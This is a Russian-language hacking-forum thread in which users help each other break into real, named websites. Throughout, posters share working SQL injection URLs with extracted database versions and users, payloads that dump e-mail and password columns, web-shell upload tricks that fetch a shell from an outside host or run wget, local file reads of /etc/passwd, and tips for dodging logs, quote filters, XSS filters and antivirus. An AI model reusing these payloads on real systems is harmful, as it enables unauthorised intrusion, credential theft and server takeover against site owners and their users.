Expl0ited said:
Использовать поиск по форуму: /showthread.php?t=191917
И внимательно читать не только первый пост.


прочитал всёравно ничего полезного не нашел. Может ктонить помочь плз?

Каким образом найти раскрытие путей?

plaeer said:
Каким образом найти раскрытие путей?


/showthread.php?t=30632

plaeer said:
Каким образом найти раскрытие путей?


поиск - классная штука.


Code:
http://www.google.ru/search?client=opera&rls=en&q=site:forum.antichat.ru+%D1%80%D0%B0%D1%81%D0%BA% D1%80%D1%8B%D1%82%D0%B8%D0%B5+%D0%BF%D1%83%D1%82%D 0%B5%D0%B9&sourceid=opera&ie=utf-8&oe=utf-8&channel=suggest

первая ссылка


Code:
/threadnav30632.html

и ещё куча тем и тому подобного.

Зашел на один портал, решил проверить логин на xss, при вставке alert('12'); в любое поле(пароль;логин) ифрейм(вводятся данные в ифрейме) выдает -

Server Error in '/' Application.


Code:
Description: An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine.



Details: To enable the details of this specific error message to be viewable on remote machines, please create a <customErrors> tag within a "web.config" configuration file located in the root directory of the current web application. This <customErrors> tag should then have its "mode" attribute set to "Off".


можно как-то использовать в своих целях?

Здравствуйте. Помигите пожалуйста.

Допустим сайт вида http://sait.com/tut-tekst/i-tut.html

возможно ли проверсти SQL иьекцию при таком виде ссылки если да то как. Какие еще можно провести атаки при таком виде ссылки чтобы получить доступ к базе данных

Такая проблема: залил файл с таким содержанием .

phpinfo вывелось без проблем, но когда делаю так eval(file_put_contents('site.ru/sh.txt')); , то ничего не происходит. Каким образом можно получить полноценный шелл?

plaeer said:
Такая проблема: залил файл с таким содержанием .
phpinfo вывелось без проблем, но когда делаю так eval(file_put_contents('site.ru/sh.txt')); , то ничего не происходит. Каким образом можно получить полноценный шелл?


во-первых, http://php.net/manual/ru/function.file-put-contents.php

во-вторых, magic quotes учитывай

а шелл так льется, например:

1=http://pentagon.gov/images/shell.txt&2=1.php&cmd=copy($_GET[1],$_GET[2]);

попугай said:
во-первых, http://php.net/manual/ru/function.file-put-contents.php
во-вторых, magic quotes учитывай
а шелл так льется, например:
1=http://pentagon.gov/images/shell.txt&2=1.php&cmd=copy($_GET[1],$_GET[2]);


1.Прочитал.

2.magic_quotes_gpc On On

3. Не работает.

plaeer said:
1.Прочитал.
2.magic_quotes_gpc On On
3. Не работает.


ну мог бы по аналогии fileputcontens заюзать

1=&2=shell.php&cmd=file_put_contents($_GET[1],$_GET[2]);

также можно вариации с методом POST использовать, чтоб в логах не следить, да и изначально писать не просто eval($_GET[CMD]), а что-нибудь поудобнее, например аплоадер файлов.

попугай said:
ну мог бы по аналогии fileputcontens заюзать
1=&2=shell.php&cmd=file_put_contents($_GET[1],$_GET[2]);
также можно вариации с методом POST использовать, чтоб в логах не следить, да и изначально писать не просто eval($_GET[CMD]), а что-нибудь поудобнее, например аплоадер файлов.


file_put_contents - пробовал, безрезультатно.

Так я лью через скулю, файл с таким кодом я хотел залить

Но увы )); почему-то не приняло. Может в бейс закодить?

Apokalepsys said:
Здравствуйте. Помигите пожалуйста.
Допустим сайт вида http://sait.com/tut-tekst/i-tut.html
возможно ли проверсти SQL иьекцию при таком виде ссылки если да то как. Какие еще можно провести атаки при таком виде ссылки чтобы получить доступ к базе данных


читай про .htaccess. Не знаешь элементарного - нех лезть

Слабо знаком с SQL-иньекциями в MSSQL.

http://www.site.com/internal.asp?ProdID=124335'


Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string ''.


http://www.site.com/internal.asp?ProdID=124335--

Все в порядке, т.е. никаких кавычек и скобок закрывать не нужно, верно?

http://www.site.com/internal.asp?ProdID=124335+AND+1=1--


Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'AND'.


http://www.site.com/internal.asp?ProdID=124335+OR+1=@@version--


Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'OR'.


Что я делаю не так?

2Nek1t прочитай тут (https://rdot.org/forum/showthread.php?t=826) про "Все о MSSQL инъекциях."

Читал, и не только там.

В общем, даже не важно, MSSQL или MySQL. Такая банальная вещь, как id=123+AND+1=1-- (или подобная) должна была сработать, но не вышло. Поэтому и спрашиваю, может нюанс какой-то не улавливаю?

Nek1t said:
Читал, и не только там.
В общем, даже не важно, MSSQL или MySQL. Такая банальная вещь, как id=123+AND+1=1-- (или подобная) должна была сработать, но не вышло. Поэтому и спрашиваю, может нюанс какой-то не улавливаю?


все нюансы можно понять только увидев линк, т.к. каждый пример индивидуален и не имеет шаблонных решений (в большинстве своём)

plaeer said:
file_put_contents - пробовал, безрезультатно.
Так я лью через скулю, файл с таким кодом я хотел залить

Но увы )); почему-то не приняло. Может в бейс закодить?


проверь версию php - file_put_contents толькой с пятой. Если действительно чеетвертая, то вариантов все равно масса - код аплоадера сунь, или через fwrite(fopen) или system(wget), или еще что-нибудь придумай.

Кавычки убери или закодь, но не в бейс, а в хекс.

попугай said:
проверь версию php - file_put_contents толькой с пятой. Если действительно чеетвертая, то вариантов все равно масса - код аплоадера сунь, или через fwrite(fopen) или system(wget), или еще что-нибудь придумай.
Кавычки убери или закодь, но не в бейс, а в хекс.


PHP/5.2.5

Каким образом в хекс кодировать?

plaeer said:
PHP/5.2.5
Каким образом в хекс кодировать?


клац (http://x3k.ru/)

или просто в консоли MySQL, select hex ('string'); (не забудь в начале добавить 0x)

есть форум на vbulletin, можно ли какнибудь посмотреть(до расшифровки хешей), какие группы могут входить в админ панель?Точнее так, в какой таблице хранятся группы которые могут входить в админку

PostgreSQL 9.0.3 on i386-portbld-freebsd8.2, compiled by GCC cc (GCC) 4.2.1 20070719 [FreeBSD], 32-bit

Близорукая инъекция.

Если через нее подбирать ascii к версии, пользователю или имени БД то все норм выводится.

Когда же начинаю вычислять имена таблиц, то они мягко говоря странные и для вариантов через INFORMATION_SCHEMA и PG_TABLES они разные:

INFORMATION_SCHEMA:


Code:
uuywywwuwuwwuwuywwuuu h u
hyuuuuu uyuy uy u
_hh_hhy_ yu_ h__ ___ssesosngio
jc_j_ hx__ x_ vx_xxceetrinaam
csccc_ ccc__cc_scxccstnrogz
kesvkc_kvvjcvvcescssefroi
vnessscssscvssvneveenool
stneeekeeevseestnsnntip
eqtnnnvnnnsennerterrpma
trqtttstttenttnbqnoogp
rorrrrerrrntrrtortllag
flffffnzbftrbfrlbqii
bibbbbtbobrbobfiorad
idlooorolobolobdlb p
dpilllzlilllilomio a
pgdiiioidiiidilpdl
aapdddldmpddpmigmd
mpppippmppggdapm
gmmmdmggmgaam gp
agggpgaaga p
aaama

ASCII идентичные UTF-8 коды для вышеуказанных имен таблиц:


Code:
117 117 121 119 121 119 119 117 119 117 119 119 117 119 117 121 119 119 117 117 117 104 117
104 121 117 117 117 117 117 117 121 117 121 117 121 117
95 104 104 95 104 104 121 95 121 117 95 104 95 95 95 95 95 115 115 101 115 111 115 110 103 105 111
106 99 95 106 95 104 120 95 95 120 95 118 120 95 120 120 99 101 101 116 114 105 110 97 97 109
99 115 99 99 99 95 99 99 99 95 95 99 99 95 115 99 120 99 99 115 116 110 114 111 103 122
107 101 115 118 107 99 95 107 118 118 106 99 118 118 99 101 115 99 115 115 101 102 114 111 105
118 110 101 115 115 115 99 115 115 115 99 118 115 115 118 110 101 118 101 101 110 111 111 108
115 116 110 101 101 101 107 101 101 101 118 115 101 101 115 116 110 115 110 110 116 105 112
101 113 116 110 110 110 118 110 110 110 115 101 110 110 101 114 116 101 114 114 112 109 97
116 114 113 116 116 116 115 116 116 116 101 110 116 116 110 98 113 110 111 111 103 112
114 111 114 114 114 114 101 114 114 114 110 116 114 114 116 111 114 116 108 108 97 103
102 108 102 102 102 102 110 122 98 102 116 114 98 102 114 108 98 113 105 105
98 105 98 98 98 98 116 98 111 98 114 98 111 98 102 105 111 114 97 100
105 100 108 111 111 111 114 111 108 111 98 111 108 111 98 100 108 98 112
100 112 105 108 108 108 122 108 105 108 108 108 105 108 111 109 105 111 97
112 103 100 105 105 105 111 105 100 105 105 105 100 105 108 112 100 108
97 97 112 100 100 100 108 100 109 112 100 100 112 109 105 103 109 100
109 112 112 112 105 112 112 109 112 112 103 103 100 97 112 109
103 109 109 109 100 109 103 103 109 103 97 97 109 103 112
97 103 103 103 112 103 97 97 103 97 112
97 97 97 109 97

PG_TABLES:


Code:
huuuywhuuuyw yyw
jy__uu y
cecjhhc_c _cxe___ecineo
sqscs vxv_jscnveensdpta
trnse_scsscestsnntapaf
borencekeesnertirr
dgbntsnsnnetnormoo
paltretetttrtlfplg
a drfnrnrrrbrio d
mfbtztbfloomg
poorlrobiiiaa
gllfibloddg
iibdoilppa
ddomldimg
ppipimpga
gmdgdpma
agpamgg
am



Code:
104 117 117 117 121 119 104 117 117 117 121 119 121 121 119
106 121 95 95 117 117 121
99 101 99 106 104 104 99 95 99 95 99 120 101 95 95 95 101 99 105 110 101 111
115 113 115 99 115 118 120 118 95 106 115 99 110 118 101 101 110 115 100 112 116 97
116 114 110 115 101 95 115 99 115 115 99 101 115 116 115 110 110 116 97 112 97 102
98 111 114 101 110 99 101 107 101 101 115 110 101 114 116 105 114 114
100 103 98 110 116 115 110 115 110 110 101 116 110 111 114 109 111 111
112 97 108 116 114 101 116 101 116 116 116 114 116 108 102 112 108 103
97 100 114 102 110 114 110 114 114 114 98 114 105 111 100
109 102 98 116 122 116 98 102 108 111 111 109 103
112 111 111 114 108 114 111 98 105 105 105 97 97
103 108 108 102 105 98 108 111 100 100 103
105 105 98 100 111 105 108 112 112 97
100 100 111 109 108 100 105 109 103
112 112 105 112 105 109 112 103 97
103 109 100 103 100 112 109 97
97 103 112 97 109 103 103
97 109

Пробывал делать to_ascii(TABLE_NAME), но в таком случае:


Code:
pg_query(): Query failed: ERROR: encoding conversion from UTF8 to ASCII not supported

Cherep said:
есть форум на vbulletin, можно ли какнибудь посмотреть(до расшифровки хешей), какие группы могут входить в админ панель?Точнее так, в какой таблице хранятся группы которые могут входить в админку


usergroupid=6

это группа админов, смотри в таблице user

Привет. Интересует заливка шелла через БД.


HTML:
http://www.stpatsfc.com/news.php?id=-2839%20UNION%20SELECT%201,2,3,4,5,6,file_priv%20fr om%20mysql.user--

Выдает ошибку:

SELECT command denied to user 'stpatsf_admin'@'web6.novara.ie' for table 'user'

Получается, что невозможно выполнить SELECT ... INTO DUMPFILE 'бла-бла', и шелл залить нельзя? Максимум это слить базу?

=Zeus= said:
Привет. Интересует заливка шелла через БД.

HTML:
http://www.stpatsfc.com/news.php?id=-2839%20UNION%20SELECT%201,2,3,4,5,6,file_priv%20fr om%20mysql.user--

Выдает ошибку:
SELECT command denied to user 'stpatsf_admin'@'web6.novara.ie' for table 'user'
Получается, что невозможно выполнить SELECT ... INTO DUMPFILE 'бла-бла', и шелл залить нельзя? Максимум это слить базу?



через SQL запрос залить шелл не получится

=Zeus= said:
SELECT command denied to user 'stpatsf_admin'@'web6.novara.ie' for table 'user'


Эта ошибка означает, что у текущего пользователя БД нет доступа к таблице mysql.user. Тем не менее при этом file_priv может быть Y. Но в данном случае экранируются кавычки, так что INTO DUMPFILE не сработает в любом случаем. MySQL там 5ой версии, слей названия таблиц, поищи админку и т.д.

Nek1t said:
Но в данном случае экранируются кавычки, так что INTO DUMPFILE не сработает в любом случаем.


Думаю что кавычки это наименьшая из проблем там. Ведь у пользователя нету прав.

Странно, я почему-то думал, что Magic Quotes можно обойти. Правда опыта у меня не много, пока в основном читаю литературу. Например Bernardo Damele, ведущий разработчик sqlmap, пишет по этому поводу так (http://www.slideshare.net/inquis/sql-injection-not-only-and-11-updated):


PHP Magic Quotes bypass: Avoid single quotes
Example on MySQL:
LOAD_FILE('/etc/passwd') will be:
LOAD_FILE(CHAR(47,101,116,99,47,112,97, 115,115,119,100)) or LOAD_FILE(0x2f6574632f706173737764)
It is not limited to bypass only PHP Magic Quotes.

есть доступ в админку сайта, но не получается залить шелл.

через менеджер изображений не получается. есть возможность добавлять свои переменные на сайте в виде массива или переменной...

можно ли какой-нибудь код добавить,чтобы можно было как-то залиться шелл?

Если есть доспут к админке - есть доступ к структуре. Можно залить нормальным образом.

если бы всё так на деле обстояло. переменные, которые уже забиты указывают в основом как выводить картинку, как показано меню и т.д. в хтмл форме.

FoXuk said:
есть доступ в админку сайта, но не получается залить шелл.
через менеджер изображений не получается. есть возможность добавлять свои переменные на сайте в виде массива или переменной...
можно ли какой-нибудь код добавить,чтобы можно было как-то залиться шелл?


В двойных кавычках(С разрешением RG, или с не экранированием одинарных), или попробовать выйти за пределы переменной.

=Zeus= said:
Думаю что кавычки это наименьшая из проблем там. Ведь у пользователя нету прав.
Странно, я почему-то думал, что Magic Quotes можно обойти.


Можно обойти, но INTO DUMPFILE требует именно кавычек и чистый путь без хекса и CHAR().

Есть вопросец.Имеется вот такой вот инклуд:


Code:
http://atlanticacorp.com/pages/admin/img_stats.php?file=../../../inf/config.php

.Но вывод идет только одной строки ( а именно 3).Можно ли выжать что то большее?

PHP:
//if($_SESSION['user_admin']>=$adminRights['stats']) {



if(isset($_GET['file']) && !empty($_GET['file'])) {



if(file_exists('./cache/'.$_GET['file'])) {



$contents=file('./cache/'.$_GET['file']);



$imgTyp=trim($contents[1]);

$imgTitel=trim($contents[2]);

$imgValues=trim($contents[3]);

$imgStrings=trim($contents[4]);



$inWerte=unserialize($imgValues);

$inStrings=unserialize($imgStrings);

}



}

Здесь не инклуд, а локальное урезанное чтение файлов.

В коде жесткое ограничение, что значения берутся только с 3 строчки. Странно, что проверка на админа закомментирована.

ДАДАДА.Меня тоже удивила, как будто специально багу мастерили в двиге.Тоесть ничего не сделать?А вот нашел сайтец на похожем движке:


Code:
http://cwerymt2.ru/index.php?s=../../../../../../../../etc/passwd%00

Двиг аналогичный, но инклуд пашет (просто видно на том сайте нуль байт не пахал).Чисто дальнейшее развитие событий какое может быть?Как происходит залив шелла через локальный инклуд, если неизвестны пути до access.log ?

Это не инклуд а читалка. Совсем разные понятия.

Всё, что ты можешь сделать с помощью этой уязвимости - читать 3-ую строчку из файлов.

Нашел SQL-инъекцию на сайте...ребята из античата раскрутили её до вывода версии, имя пользователя, таблицы... Напишите как можно из этих данных получить пароли всех пользователей в том числе и админа)))

Вот SQL-инъекции

http://www.tnak.am/sub/aforizm.php?act=1&uid=52&let=1/**/and/**/row(1,1)%3E(select/**/count(*),concat(version(),0x3a,floor(rand()*2))/**/x/**/from/**/(select/**/1/**/union/**/select/**/2)a/**/group/**/by/**/x/**/limit/**/1)+--+1

aydin-ka said:
Нашел SQL-инъекцию на сайте...ребята из античата раскрутили её до вывода версии, имя пользователя, таблицы... Напишите как можно из этих данных получить пароли всех пользователей в том числе и админа)))
Вот SQL-инъекции
http://www.tnak.am/sub/aforizm.php?act=1&uid=52&let=1/**/and/**/row(1,1)%3E(select/**/count(*),concat(version(),0x3a,floor(rand()*2))/**/x/**/from/**/(select/**/1/**/union/**/select/**/2)a/**/group/**/by/**/x/**/limit/**/1)+--+1


/thread43966.html

при входе в админку выдает


Fatal error: Class 'COM' not found in /www/htdocs/site/custom.php on line 5
из-за чего может не пускать? из-за другой геолокации или нет?

FoXuk said:
при входе в админку выдает

Fatal error: Class 'COM' not found in /www/htdocs/site/custom.php on line 5
из-за чего может не пускать? из-за другой геолокации или нет?




" if author else f"

FoXuk said:
при входе в админку выдает

Fatal error: Class 'COM' not found in /www/htdocs/site/custom.php on line 5
из-за чего может не пускать? из-за другой геолокации или нет?




Фатальная ошибка: Класс 'COM' не найден в /www/htdocs/site/custom.php на строке 5

как отфильтровать запрос таким образом, мне например надо inurl:index.php?test= но что бы искало по контенту например powered by coolsite

попробовал такую чушь inurl:index.php?test= intextowered by coolsite

не канает

подскажите

foozzi said:
как отфильтровать запрос таким образом, мне например надо inurl:index.php?test= но что бы искало по контенту например powered by coolsite
попробовал такую чушь inurl:index.php?test= intext
owered by coolsite
не канает
подскажите


Примерно так:


Code:
"Powered by: vBulletin" inurl:forum42.html

Советую изучить все поиск. запросы гугла и искать так как тебе надо, а не как он выдаёт.

выдаеться ошибка скули, добился через blind

но не могу немного в ней разобраться, вот она:


Code:
Database error: Invalid SQL: insert into logs (OBJECT_TYPE, OBJECT_ID, HTTP_USER_AGENT, BROWSER_NAME, BROWSER_VERSION, USER_PLATFORM, USER_OS, USER_IP, DATE, TIME,user_id, session_id) values ('topic',361 and (select 1 from mysql.user limit 0,1)=1,'Mozilla/5.0 (X11; Linux i686; rv:7.0a2) Gecko/20110728 Firefox/7.0a2 Iceweasel/7.0a2', 'Netscape','5.0', 'Unix','linux', '**.***.***.***', CURDATE(), CURTIME(),0,'4e84ef8d4c114f28b16dde2130be4638')
MySQL Error: 1142 (SELECT command denied to user 'seesci_org@s3951'@'s109.loopia.se' for table 'user')
Session halted.

звездочками закрыл ip

foozzi said:
выдаеться ошибка скули, добился через blind
но не могу немного в ней разобраться, вот она:

Code:
Database error: Invalid SQL: insert into logs (OBJECT_TYPE, OBJECT_ID, HTTP_USER_AGENT, BROWSER_NAME, BROWSER_VERSION, USER_PLATFORM, USER_OS, USER_IP, DATE, TIME,user_id, session_id) values ('topic',361 and (select 1 from mysql.user limit 0,1)=1,'Mozilla/5.0 (X11; Linux i686; rv:7.0a2) Gecko/20110728 Firefox/7.0a2 Iceweasel/7.0a2', 'Netscape','5.0', 'Unix','linux', '**.***.***.***', CURDATE(), CURTIME(),0,'4e84ef8d4c114f28b16dde2130be4638')
MySQL Error: 1142 (SELECT command denied to user 'seesci_org@s3951'@'s109.loopia.se' for table 'user')
Session halted.

звездочками закрыл ip


ошибка тебе выдается потому что нет таблици user, покажи сам запрос который делаешь

foozzi said:
выдаеться ошибка скули, добился через blind
но не могу немного в ней разобраться, вот она:

Code:
Database error: Invalid SQL: insert into logs (OBJECT_TYPE, OBJECT_ID, HTTP_USER_AGENT, BROWSER_NAME, BROWSER_VERSION, USER_PLATFORM, USER_OS, USER_IP, DATE, TIME,user_id, session_id) values ('topic',361 and (select 1 from mysql.user limit 0,1)=1,'Mozilla/5.0 (X11; Linux i686; rv:7.0a2) Gecko/20110728 Firefox/7.0a2 Iceweasel/7.0a2', 'Netscape','5.0', 'Unix','linux', '**.***.***.***', CURDATE(), CURTIME(),0,'4e84ef8d4c114f28b16dde2130be4638')
MySQL Error: 1142 (SELECT command denied to user 'seesci_org@s3951'@'s109.loopia.se' for table 'user')
Session halted.

звездочками закрыл ip


у тя там инсерт происходит, ты не можешь выводить. Это как общее, а у юзера закрыты права на селект.

Melfis said:
у тя там инсерт происходит, ты не можешь выводить. Это как общее, а у юзера закрыты права на селект.


вот открывает страницу, по идее все норм


Code:
http://www.seesciencepolicy.org/sitegenius/topic.php?id=361 and (SELECT substring(concat(1,password),1,1) from users limit 0,1)=1

вот тебе вывод через ошибку:


http://www.seesciencepolicy.org/sitegenius/topic.php?id=361+OR+(SELECT+COUNT(*)+FROM+(SELECT+ 1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT( MID((select+concat_ws(0x3a,user(),version(),databa se())),1,63),+FLOOR(RAND(0)*2)))


seesci_org@s3951@s109.loopia.se:5.0.87-log:seesciencepolicy_org

Направьте на путь истинный пожалуйста)

На запрос:


Code:
http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat( table_name),4,5,6+from+INFORMATION_SCHEMA.TABLES--

нормально выдает имена всех таблиц.

На запрос:


Code:
http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat( column_name),4,5,6+from+INFORMATION_SCHEMA.COLUMNS +where+table_name=CHAR(таблица)--

корректно отдает имена столбцов.

А на запрос:


Code:
http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat( столбец),4,5,6+from+таблица--

шлет лесом вот такой фразой:


Code:
MySQL error:
1146 : Table 'база.таблица' doesn't exist

Как так не существует?? Ведь я же по второму запросу корректно получил столбцы из этой таблицы... И такая история по всем таблицам. Колонки получаю, а тяну данные, пишет, что таблицы нет.

Как такое возможно?

DronS said:
Направьте на путь истинный пожалуйста)
На запрос:

Code:
http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat( table_name),4,5,6+from+INFORMATION_SCHEMA.TABLES--

нормально выдает имена всех таблиц.
На запрос:

Code:
http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat( column_name),4,5,6+from+INFORMATION_SCHEMA.COLUMNS +where+table_name=CHAR(таблица)--

корректно отдает имена столбцов.
А на запрос:

Code:
http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat( столбец),4,5,6+from+таблица--

шлет лесом вот такой фразой:

Code:
MySQL error:
1146 : Table 'база.таблица' doesn't exist

Как так не существует?? Ведь я же по второму запросу корректно получил столбцы из этой таблицы... И такая история по всем таблицам. Колонки получаю, а тяну данные, пишет, что таблицы нет.
Как такое возможно?


Возможно нет доступа, нет таблицы, наложен чудодейственный фильтр или INFORMATION_SCHEMA вообще муляж.Попробуй обратиться к другим таблицам из INFORMATION_SCHEMA, и к таблицам к текущей базе данных.

DronS said:
Направьте на путь истинный пожалуйста)


вообще-то правильней сделать так:


Code:
http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat( table_schema,0x3a,table_name),4,5,6+from+INFORMATI ON_SCHEMA.TABLES--

дальше получаешь колонки, и обращаешься:


Code:
http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat( столбец),4,5,6+from+база.таблица--

Всё дело в том, что ты пытаешься обратится к таблице которая скорее всего находится в другой базе, т.к. обращаться нужно напрямую "база.таблица"

http://www.infinitestatue.com/product_info.php?products_id='60


I see it have error but when i type:


http://www.infinitestatue.com/product_info.php?products_id=60' (nothing)


can anybody help me, pls! thank

oODungVTOo said:
I see it have error but when i type:
can anybody help me, pls! thank




PHP:

oODungVTOo said:
I see it have error but when i type:
can anybody help me, pls! thank




http://www.infinitestatue.com/news_detail.php?news_id=-70+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user(),@@version_compile_os),6,7+--+&osCsid=4061a9ea7f040975ea084fba4a9b6275


4.1.22:webmaster_infinite:infinite@localhost:redha t-linux-gnu

какие команды тут можно выполнить что бы получить доступ или хеши?


Code:
_http://www.mymicrocredit.org/mymicrocredit/index.php/forum/advsearch?q=hilfe&catids=5\%27

Как здесь добиться вывода БД?


http://school8.brestonline.com/index.php?act=gal&lng=ru&image=32'

FlaktW said:
Как здесь добиться вывода БД?




Code:
http://school8.brestonline.com/index.php?act=gal&lng=ru&image='and(select(1)from(select(count(*)),concat(( select(version())from(information_schema.tables)li mit/**/0,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)or'

http://www.rulsmart.com/page/4209999999char%2827%29+union+select+1,2,3,2,3,4,4, 4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4

что я делаю не так?

nikon2k said:
http://www.rulsmart.com/page/4209999999char%2827%29+union+select+1,2,3,2,3,4,4, 4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4
что я делаю не так?


тут нету скули.

А ещё интересно, зачем ты вставляешь через чар.

upd. Если ты таким макаром хотел вставить кавычку(но перепутал код символа), то нигде этим способом ничего не добьёшься.

Какой прогой можно сниффить программы автоматического проведения SQL Injection?!

кавычки ныкаю, извиняюсь

http://gigwarez.ru/page/4209999999999999999999999/

линк

Osstudio said:
Какой прогой можно сниффить программы автоматического проведения SQL Injection?!


wpe, rpe


nikon2k said:
кавычки ныкаю, извиняюсь
http://gigwarez.ru/page/4209999999999999999999999/
линк


и тут нету

хмм как нету? после второго значения лимита можно свой запрос добавить не?

nikon2k said:
хмм как нету? после второго значения лимита можно свой запрос добавить не?


Можно, но он фильтруется. К примеру ф-цией intval().

а с char() тоже не получится?

nikon2k said:
хмм как нету? после второго значения лимита можно свой запрос добавить не?


можно всё что хочешь туда добавить, но как сказали выше - там стоит фильтр. Что-то типа /\d+/ или же (int)$_GET['some_param']. А ранее проверяется на вхождение в строку кавычки.

upd.


а с char() тоже не получится?


ты к нормальной("существующей") странице добавь какие-нить буквы/символы. Если отображается всё тоже самое, то там стоит фильтр.

nikon2k said:
а с char() тоже не получится?


Фильтр пропускает только числа.

http://gigwarez.ru/page/12,34,45/ => 12

http://gigwarez.ru/page/12blabla/ => 12

Code:
http://site.ru/?a=10\"

1)как обойти в данном случае фильтр на сервере? Пробел не проходит (точнее не фильтр, а какая то странная ошибка c обрубанием ссылки после пробела и вывода текста: [Bad Request

Your browser sent a request that this server could not understand.

The request line contained invalid characters following the protocol string.]

Вариант замены пробела на "/" или "/**/" не проходит в chrome, что обидно Во всех остальных браузерах срабатывает.

2) как обойти xss фильтр в IE8 в данном случае?

3) как обойти в данном случае антивирус ESET Nod 32? На домены вида *.co.cc он ругается

Подскажите варианты

P.S. Также нельзя использовать ";", возможно ещё что-то.

Ситуация следующая, на ресурсе присутствует sql-иньекция.

Подскажите как вывести всю нужную информацию, а не только часть?

Пример запроса:

test.ru/test.php?id=-40+union+select+1,group_concat(0x3a,mail,pwd),3,4, 5,6,7,8,9+from+members--

mix0x0 said:
Ситуация следующая, на ресурсе присутствует sql-иньекция.
Подскажите как вывести
всю
нужную информацию, а не только часть?
Пример запроса
:
test.ru/test.php?id=-40+union+select+1,group_concat(0x3a,mail,pwd),3,4, 5,6,7,8,9+from+members--




Code:
test.ru/test.php?id=-40+union+select+1,(select(@x)from(select(@x:=0x00) ,(select(0)from(members)where(0x00)in(@x:=concat(@ x,0x3c62723e,mail,0x3a,pwd))))x),3,4,5,6,7,8,9--+

Expl0ited said:

Code:
test.ru/test.php?id=-40+union+select+1,(select(@x)from(select(@x:=0x00) ,(select(0)from(members)where(0x00)in(@x:=concat(@ x,0x3c62723e,mail,0x3a,pwd))))x),3,4,5,6,7,8,9--+



спасибо, вот только серв упал

Возможно ли вывести данные по частям? Чтобы не сильно нагружать сервер.

Пробовал использовать limit, но безрезультатно

mix0x0 said:
спасибо, вот только серв упал
Возможно ли вывести данные по частям? Чтобы не сильно нагружать сервер.
Пробовал использовать limit, но безрезультатно


Получаемый массив данных не должен превышать одного мегабайта, иначе тянуть только стандартными методами.

mix0x0 said:
спасибо, вот только серв упал
Возможно ли вывести данные по частям? Чтобы не сильно нагружать сервер.
Пробовал использовать limit, но безрезультатно


а что тебе мешает спарсить данные в цикле лимита?

элементарный парсер на пхп, указываешь максимальный лимит и все, стукни в пм с ссылкой, подкину тебе парсер настроенный под твой сайт.

Osstudio said:
Какой прогой можно сниффить программы автоматического проведения SQL Injection?!


Charles.

Где-то читал, что с какой-то версии php нуллбайт в файловых функциях(чтение, инклюд, запись, аплоад) больше не работает.

Так ли это? Если да, то с какой именно версии?

Тут вопрос такой)

http://www.gilmanpastor.com/admin/login.php

Достал через скуль мыльники и пассы админов...

Но войти не могу в админку...

Что за третее поле не могу понять

пост параметр byteme

что в него вводить хз) в бд ничего не нашол = \

Есть ли тут скуль? И можно ли в наше время обойти intval() и просто одинокий (int)?


PHP:
$albumID= (int)$_POST['act_album'];



if ($_POST['update']){



check_admin_referer('ngg_album');



if ($_POST['newalbum']){

$newalbum=attribute_escape($_POST['newalbum']);

$result=$wpdb->query("INSERT INTO$wpdb->nggalbum(name, sortorder) VALUES ('$newalbum',' 0')");

if ($result)nggGallery::s how_message(__('Update Successfully','nggallery') );

}



if ($albumID>0){

// get variable galleryContainer

parse_str($_POST['sortorder']);

if (is_array($gid)){

$serial_sort=serialize($gid);

$wpdb->query("UPDATE$wpdb->nggalbumSET sortorder = '$serial_sort' WHERE id =$albumID");

} else {

$wpdb->query("UPDATE$wpdb->nggalbumSET sortorder = '0' WHERE id =$album ID");

}

nggGallery::show_message(__('Update Successfully' ,'nggallery'));

}

}

ne0k said:
Есть ли тут скуль? И можно ли в наше время обойти intval() и просто одинокий (int)?

PHP:
$albumID= (int)$_POST['act_album'];



if ($_POST['update']){



check_admin_referer('ngg_album');



if ($_POST['newalbum']){

$newalbum=attribute_escape($_POST['newalbum']);

$result=$wpdb->query("INSERT INTO$wpdb->nggalbum(name, sortorder) VALUES ('$newalbum',' 0')");

if ($result)nggGallery::s how_message(__('Update Successfully','nggallery') );

}



if ($albumID>0){

// get variable galleryContainer

parse_str($_POST['sortorder']);

if (is_array($gid)){

$serial_sort=serialize($gid);

$wpdb->query("UPDATE$wpdb->nggalbumSET sortorder = '$serial_sort' WHERE id =$albumID");

} else {

$wpdb->query("UPDATE$wpdb->nggalbumSET sortorder = '0' WHERE id =$album ID");

}

nggGallery::show_message(__('Update Successfully' ,'nggallery'));

}

}





то на сколько я понимаю у тебя уязвимость в переменной $albumID так как она никак не фильтруется, следовательно можно выполнить SQL-инекцию

winstrool said:
то на сколько я понимаю у тебя уязвимость в переменной $albumID так как она никак не фильтруется, следовательно можно выполнить SQL-инекцию


Хе-хе, ты ошибаешься.


PHP:
$albumID= (int)$_POST['act_album'];



В переменную albumID не попадет ничего кроме чисел.


PHP:
$newalbum=attribute_escape($_POST['newalbum']);

Если я правильно нагуглил эту ф-цию из WP, то и тут тоже скули нету.


ne0k said:
И можно ли в наше время обойти intval()


intval() можно обойти только если он присутствует в условии, к примеру такой код:


PHP:




Exp: .php?id=123'

Return: 123'

Если наш параметр начинает с числа, то intval() пропустит и в самом запросе переменная уже не фильтруется => SQL-inject возможен при таком условии.

С is_numeric такое не прокатит.


PHP:
if (is_array($gid)){

$serial_sort=serialize($gid);

$wpdb->query("UPDATE$wpdb->nggalbumSET sortorder = '$serial_sort' WHERE id =$albumID");



А вот здесь вот провести SQL-inject вполне возможно...

При условии что $gid можно манипулировать или переопределить через register_globals.

Вот проверил на локалке с таким кодом:


PHP:




